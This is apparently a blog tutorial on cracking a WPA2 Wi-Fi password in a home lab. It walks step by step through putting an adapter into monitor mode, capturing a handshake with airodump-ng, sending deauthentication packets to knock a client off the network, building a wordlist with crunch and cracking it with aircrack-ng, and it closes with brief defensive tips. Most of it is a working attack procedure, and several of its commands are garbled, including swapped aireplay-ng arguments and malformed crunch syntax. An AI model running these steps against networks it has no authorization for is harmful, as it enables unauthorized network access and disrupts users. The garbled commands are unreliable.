How to Crack WPA2 WIFI Router Password

Cover Image: Wifi logo. This article discusses the best wifi hacking method for WPA/WPA2-protected Wireless networks and how organisations can best protect their wireless networks. (Wikimedia Commons)

Disclaimer: This article is for educational purposes and seeks to promote ethical hacking and superior cybersecurity practices in organizations and private entities. It does not advocate for any malicious intent. Furthermore, all materials used in this tutorial are solely personal and intentionally set vulnerable. I, therefore, absolve myself from any future unauthorized scripting from parties reading this article that may compromise the integrity of respective wireless networks

WPA/WPA2 WIFI hacking is one of the toughest exploits due to time bottlenecks and cryptography skills needed. However, with superb dedication and commitment to learning, cracking them is a matter of minutes and even seconds depending on the nature of its password authentication. We will be cracking my router using my Hacking lab setup today and exploring ways of strengthening WIFI for companies or other entities to stay safe on the web.

Introductory Theory of Literature

WPA/WPA2 networks can only be hacked using plain brute force since the secret key, unlike in WEP, is dynamic and changes over time (Kumkar et al., 2012).

Requirements

• Kali Linux Separate OS /VMware Kali Linux
• Windows PC / VMware Windows
• External USB Adapter (optional: can use the Inbuilt NIC)
• A Wifi Router

Image 1 : Target Router; TPLink Wireless N router WR840N

Image 2: The hacking Lab station; Laptop, the Attacker, is imbibed with a 600Mbps Wireless USB Wifi Adapter Dongle Dual Band 2.4G/5GHz W/Antenna 802.11AC; The windows PC desktop is the victim imbibed with Windows 10 pro and a USB Adapter Dongle dual band W/Antenna 802.11AC. All devices are connected to my wifi network “Frank’s 306” with the password “myPYT12**”

Procedure

• Set the Attacker wireless USB WIFI dongle/NIC card to monitor mode using the root privileges (su) i.e

1. If config wlan 0 down; it can be restarted with ifconfig wlan0 up
2. Airmon-ng check kill → kills the networking services; restart with systemctl restart network
3. iwconfig wlan0 mode monitor → monitoring mode for NIC/External USB

• Run ifconfig to confirm wlan0 has UNSPEC property which indicates the NIC is ready for hacking (Optional if you can already see the network icon indicating networking services are already down).
• Capture the 2.4 GHz or 5GHz network that you need to hack. In this case, we are hacking my router so “Frank’s 306” will be shown below. We will use the 5GHz framework bandwidth, a short range and a home networking system radio band, as it is faster. You can either use 5GHz/2.4GHz but 5GHz is recommended.

airodump-ng — band b wlan0; can use –band a as well

• Take note of the BSSID (MAC address of the router ), CH(channel) and ESSID(Wifi Name)

BSSID → 50:D4:F7:10:B4:88 , CH → 2 , ESSID → Frank’s 306

• Open a new Terminal, su it then Checks who is connected to that WIFI router. This is the start of capturing the handshake, a method which allows us to match what they will key in as the wifi password after we knock them out of the network with our own password list stored in a txt file. In this case, our windows PC is connected and noted

airodump-ng –bssid( 50:D4:F7:10:B4:88 ) –channel(2) — write capturehandshake –band -a wlan0 → Creates a new file called capture handshake(ours was capture handshake-01.cap since capturehandshake previously existed) that stores the handshake results.

• Take note of the victims/target devices connected to that network. Write down their MAC address (STATION column). First, let us verify our windows PC Mac address with the following commands on cmd or by loading up the REALTEK Wireless wifi tool. We note that the mac address from the STATION column in the previous step in Linux that matches the output from the windows PC is : 20:0D:B0:46:7E:00

ipconfig/all → lists all the network devices and their properties

• Open a new terminal, su it then sends the deauthentication packets to the victim; This diconnects them from the network which then aireplay-ng captures the key from them on re-attempt to log in: Observe the Windows PC reconnecting and disconnecting from the WIFI.

aireplay-ng -0 -0 -a (Mac address of the PC : 20:0D: B0:46:7E:00) -C(WIFI BSSID which is 50:D4:F7:10:B4:88 -D wlan0 → Forces packets to the victim

• Watch the window on step 5 where we sent airodump-ng to capture the handshake on the router reconnections. You will receive a notification on the top right corner like “ Handshake captured”.However, we noted that our Windows PC disconnected from the network and reattempted to connect. I connected manually. This also shows that the handshake has been captured hence try to redo the de-authentication attack the aireplay if the victim doesn’t disconnect and attempts reconnection. You can also observe from the image below our victim PC recorded the highest lost frames compared to its peers connected to the network noting that the Attacking PC is actually sending “deauth” packets

If the step is successful, observed windows PC disconnections and reconnection/manual reconnection, go back to step 6/previous step and click ctrl +C to stop the de-authentication process

• Create a Password dump file using crunch to try to match what has been recorded on the handshake file in step 7. Our wifi password for the sake of this tutorial is myPYT12**

crunch 9(Nine letters since our password is nine characters long) 9 (Nine possible permutations) 123456789a-z (The characters you want to be included in the password. In this tutorial, let’s just match the password accurately to the prediction as in the code below) -t my@@@@@**(Type the password guesses → here we assume our password starts with my and ends with double ** which is technically true. However, adjust for your preference. Many @ in the code imply a larger wordlist and a longer cracking time since the tool attempts to guess many alphanumeric combinations per @ space. This is vice versa when more hints are placed in the guess template )-o wordlist → creates a password file dump called wordlist: Final code below

crunch 9 9 myPYT12** -t my@@@@*@ -t -o wordlist

• Run the final code script where the wordlist generated in step 9 matches the handshake. cap file. Give it some minutes or seconds depending on how you configured it in step 9

aircrack-ng capturehandshake-01.cap -w wordlist

• Password matched finally in 24 seconds as from the previous step!

Follow-up notes:

• For better observations, open 3 terminals and su all of them at once and place them side by side to better observe step 5 “ handshake captured notification”
• Always use an external WLAN card as the internal NIC is sometimes slow and occupied with internal processes i.e background apps running on the network.
• Update and upgrade Linux to make sure aircrack-ng too is up to date to avoid lags → sudo apt-get update && sudo apt-get upgrade
• Learn more on aircrack-ng by typing man aircrack-ng or reading on the web

Recommendations

• Organizations can policy up the use of LAN to reduce wireless attacks from external observers where the MAC address per PC is registered for use. In case of an attack, it can be easy to identify the victim loophole.
• Using WPA2-Enterprise protection that allows users in the company to log into the wifi using their intranet credentials. Such networks require more effort to hack.
• Encouraging safe password maintenance policies within employees. For instance, avoiding postage of passwords(even password hints) online or carelessly on desks where an external observer can easily gain access. Aircrack-ng only needs hints to determine the password as demonstrated

References (recommended for further reading )

Kumkar, V., Shrawne, S., Tiwari, A., Tiwari, P., & Gupta, A. (2012). Vulnerabilities of Wireless Security protocols (WEP and WPA2) Vulnerabilities of Wireless Security protocols (WEP and WPA2). International Journal of Advanced Research in Computer Engineering & Technology, 1(2).